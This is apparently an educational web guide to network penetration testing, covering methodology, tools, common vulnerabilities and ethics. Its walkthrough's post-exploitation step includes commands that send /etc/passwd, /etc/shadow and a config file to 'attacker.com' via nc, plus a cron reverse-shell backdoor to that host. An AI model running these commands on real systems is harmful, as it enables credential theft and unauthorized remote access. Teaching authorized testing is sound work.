Practical Network Penetration Testing

A comprehensive guide to methodologies, tools, and techniques for effective network security assessment

Methodology
Tools
Techniques
Best Practices
Table of Contents
Introduction to Network Penetration Testing

Network penetration testing is the practice of simulating real-world attacks on computer networks to identify and address security vulnerabilities before malicious actors can exploit them. Unlike automated vulnerability scanning, penetration testing involves active exploitation attempts by skilled security professionals who think and act like attackers.

Why Perform Network Pentests?

  • Identify exploitable vulnerabilities in network infrastructure
  • Test the effectiveness of security controls and defenses
  • Meet compliance requirements (PCI DSS, HIPAA, etc.)
  • Validate security investments and prioritize remediation efforts
  • Improve incident response capabilities through realistic scenarios

Types of Network Pentests

  • Black Box: Tester has no prior knowledge of the target
  • White Box: Tester has complete knowledge of the target
  • Gray Box: Tester has partial knowledge of the target
  • External: Testing from outside the network perimeter
  • Internal: Testing from within the network
Penetration Testing Methodology
A structured approach to network penetration testing

Following a systematic methodology ensures thorough coverage and consistent results. While different frameworks exist (PTES, OSSTMM, NIST), most network penetration tests follow these core phases:

1. Reconnaissance

Gathering information about the target network without direct interaction.

Key Activities

  • OSINT (Open Source Intelligence) gathering
  • DNS enumeration and analysis
  • WHOIS and public record lookups
  • Social media research
  • Google dorking and search engine reconnaissance

Common Tools

theHarvester
Shodan
Maltego
Recon-ng
OWASP Amass

2. Scanning & Enumeration

Active probing of the target network to identify hosts, services, and potential vulnerabilities.

Key Activities

  • Network mapping and host discovery
  • Port scanning and service identification
  • OS fingerprinting
  • Service enumeration
  • Vulnerability scanning

Common Tools

Nmap
Masscan
Nessus/OpenVAS
Nikto
enum4linux

3. Vulnerability Analysis

Analyzing discovered services and systems for security weaknesses.

Key Activities

  • Identifying known vulnerabilities in services
  • Configuration analysis
  • Password policy assessment
  • Firewall/IDS/IPS evasion testing
  • Manual verification of scanner findings

Common Tools

Nessus
OpenVAS
Nexpose
Qualys
Burp Suite

4. Exploitation

Actively exploiting identified vulnerabilities to gain access to systems.

Key Activities

  • Exploiting network service vulnerabilities
  • Password attacks (brute force, credential stuffing)
  • Man-in-the-middle attacks
  • Privilege escalation
  • Social engineering (if in scope)

Common Tools

Metasploit
Hydra
Hashcat
Responder
Cobalt Strike

5. Post-Exploitation

Actions taken after gaining access to demonstrate impact and risk.

Key Activities

  • Privilege escalation
  • Lateral movement through the network
  • Data exfiltration testing
  • Persistence mechanism testing
  • Evidence collection for reporting

Common Tools

Mimikatz
Empire
BloodHound
PowerSploit
CrackMapExec

6. Reporting

Documenting findings, impacts, and remediation recommendations.

Key Activities

  • Executive summary creation
  • Technical findings documentation
  • Risk assessment and prioritization
  • Remediation recommendations
  • Evidence preservation

Common Tools

Dradis
Faraday
PlexTrac
Markdown/LaTeX
Custom templates
Essential Network Pentesting Tools
The most important tools in a network penetration tester's arsenal
Shodan

The search engine for Internet-connected devices. Helps identify exposed services and potential entry points.

# Example Shodan queries
org:"Target Company"
hostname:"example.com"
port:3389 country:"US"
http.title:"Admin Login"
OWASP Amass

In-depth DNS enumeration and network mapping tool that uses multiple techniques to discover subdomains.

# Basic subdomain enumeration
amass enum -d example.com

# Passive reconnaissance only
amass enum -passive -d example.com
theHarvester

Gathers emails, subdomains, hosts, employee names, open ports and banners from different public sources.

# Gather information from multiple sources
theharvester -d example.com -b google,linkedin,twitter,shodan

# Limit results and save to file
theharvester -d example.com -l 500 -b all -f results.html
Common Network Vulnerabilities
Frequently discovered issues during network penetration tests
Weak Authentication
High
Systems with default, weak, or reused credentials.

Common Examples

  • Default router credentials (admin/admin)
  • Password reuse across multiple systems
  • Lack of multi-factor authentication
  • Weak password policies

Testing Approach

Password spraying, credential stuffing, brute force attacks

Unpatched Systems
Critical
Systems missing critical security updates.

Common Examples

  • EternalBlue (MS17-010) vulnerability
  • Outdated web servers (Apache, Nginx)
  • Legacy operating systems (Windows 7, Server 2008)
  • Unpatched VPN appliances

Testing Approach

Vulnerability scanning, version fingerprinting

Insecure Network Services
High
Unnecessarily exposed or misconfigured services.

Common Examples

  • Open SMB shares with sensitive data
  • Telnet instead of SSH
  • Unencrypted FTP servers
  • SNMP with default community strings

Testing Approach

Port scanning, service enumeration, banner grabbing

Misconfigured Firewalls
High
Firewall rules that are too permissive or improperly configured.

Common Examples

  • Overly permissive ingress/egress filtering
  • Unnecessary open ports
  • Inconsistent rule enforcement
  • Outdated firewall software

Testing Approach

Firewall rule testing, egress filtering tests

Insecure Protocols
Medium
Use of deprecated or unencrypted communication protocols.

Common Examples

  • HTTP instead of HTTPS
  • SMBv1 instead of SMBv3
  • Unencrypted email protocols (POP3, IMAP)
  • Telnet instead of SSH

Testing Approach

Protocol analysis, traffic capture, MitM attacks

Weak Network Segmentation
High
Insufficient separation between network zones of different trust levels.

Common Examples

  • Flat networks without VLANs
  • Direct access from user networks to critical systems
  • Inadequate DMZ implementation
  • Missing internal firewalls

Testing Approach

Network mapping, lateral movement testing

Practical Walkthrough Examples
Step-by-step examples of common network penetration testing scenarios

External Network Penetration Test Walkthrough

This example demonstrates a typical approach to testing an organization's external network perimeter.

Step 1: Reconnaissance

# Identify IP ranges owned by the target
whois -h whois.arin.net "n example.com"

# Discover subdomains
amass enum -d example.com -o subdomains.txt

# Resolve subdomains to IP addresses
for sub in $(cat subdomains.txt); do host $sub | grep "has address" | cut -d " " -f 4 >> ips.txt; done

During this phase, we identify the target's network footprint, including IP ranges, domain names, and subdomains. This helps map out the attack surface before active scanning begins.

Step 2: Service Discovery

# Initial port scan
nmap -sS -T4 -p 21,22,23,25,53,80,443,8080,8443 -iL ips.txt -oA quick_scan

# Comprehensive scan on discovered hosts
nmap -sS -sV -sC -p- -iL live_hosts.txt -oA full_scan

# Service version detection
nmap -sV --version-intensity 9 -p $(cat open_ports.txt | tr '\n' ',') 192.168.1.100

Here we identify open ports and running services on the target's external-facing systems. The initial scan focuses on common ports, followed by a more comprehensive scan of live hosts.

Step 3: Vulnerability Identification

# Scan web applications
nikto -h https://example.com -o nikto_results.txt

# Check for SSL/TLS issues
sslscan example.com:443

# Vulnerability scan with Nessus (via CLI)
nessuscli scan --policy "External Network Scan" --targets "$(cat live_hosts.txt)"

After identifying services, we look for known vulnerabilities in those services. This includes web application scanning, SSL/TLS testing, and comprehensive vulnerability scanning.

Step 4: Exploitation

# Exploit outdated web server
searchsploit apache 2.4.39

# In Metasploit
use exploit/unix/webapp/apache_struts_rce
set RHOSTS 192.168.1.100
set RPORT 8080
set TARGETURI /vulnerable-app/
exploit

Based on discovered vulnerabilities, we attempt to exploit them to gain access to the target systems. This might involve using public exploits, custom scripts, or tools like Metasploit.

Step 5: Post-Exploitation

# Privilege escalation
python linpeas.py

# Data exfiltration test
tar czf /tmp/sensitive_data.tar.gz /etc/passwd /etc/shadow /var/www/config.php
nc attacker.com 4444 &lt /tmp/sensitive_data.tar.gz

# Establish persistence
echo "* * * * * /bin/bash -c 'bash -i &gt& /dev/tcp/attacker.com/4445 0&gt&1'" /tmp/cron_backdoor
crontab /tmp/cron_backdoor

After gaining access, we demonstrate the potential impact by attempting privilege escalation, accessing sensitive data, and establishing persistence. This helps illustrate the real-world risk of the vulnerabilities.

;
Best Practices for Network Penetration Testing
Guidelines to ensure effective, safe, and professional penetration testing
Before the Test
  • Obtain proper written authorization
  • Define clear scope and boundaries
  • Establish emergency contacts
  • Create a detailed test plan
  • Perform risk assessment for testing activities
  • Set up isolated testing environment when possible
During the Test
  • Maintain detailed documentation of all activities
  • Regularly communicate status with stakeholders
  • Avoid denial-of-service conditions
  • Test during approved time windows
  • Respect out-of-scope systems and data
  • Secure sensitive data collected during testing
After the Test
  • Provide clear, actionable remediation steps
  • Prioritize findings based on risk
  • Securely delete sensitive client data
  • Offer retesting after remediation
  • Conduct a lessons learned session
  • Maintain confidentiality of results
Technical Considerations
  • Use staged payloads to prevent accidental execution
  • Implement rate limiting for intensive scans
  • Verify vulnerabilities manually to reduce false positives
  • Take incremental backups of your testing data
  • Use dedicated testing infrastructure
  • Maintain chain of custody for any evidence collected
Ethical Considerations

Network penetration testing involves accessing systems and data in ways that would normally be considered unauthorized. This creates ethical responsibilities beyond technical considerations:

  • Respect privacy - Minimize access to personal or sensitive data
  • Do no harm - Avoid actions that could damage systems or data
  • Maintain confidentiality - Treat all findings as strictly confidential
  • Report responsibly - Provide clear, actionable information without unnecessary alarmism
  • Stay within scope - Resist the temptation to explore beyond authorized boundaries
;
Additional Resources
Tools, training, and references to enhance your network penetration testing skills
Offensive Security Certified Professional (OSCP)

Hands-on penetration testing certification that teaches practical, real-world skills.

Learn more
eLearnSecurity Penetration Testing Professional (ePTP)

Comprehensive course covering network penetration testing methodologies and techniques.

Learn more
SANS SEC560: Network Penetration Testing and Ethical Hacking

In-depth training on network penetration testing from one of the most respected cybersecurity training organizations.

Learn more
TCM Security - Practical Network Penetration Tester (PNPT)

Practical certification focused on real-world penetration testing skills.

Learn more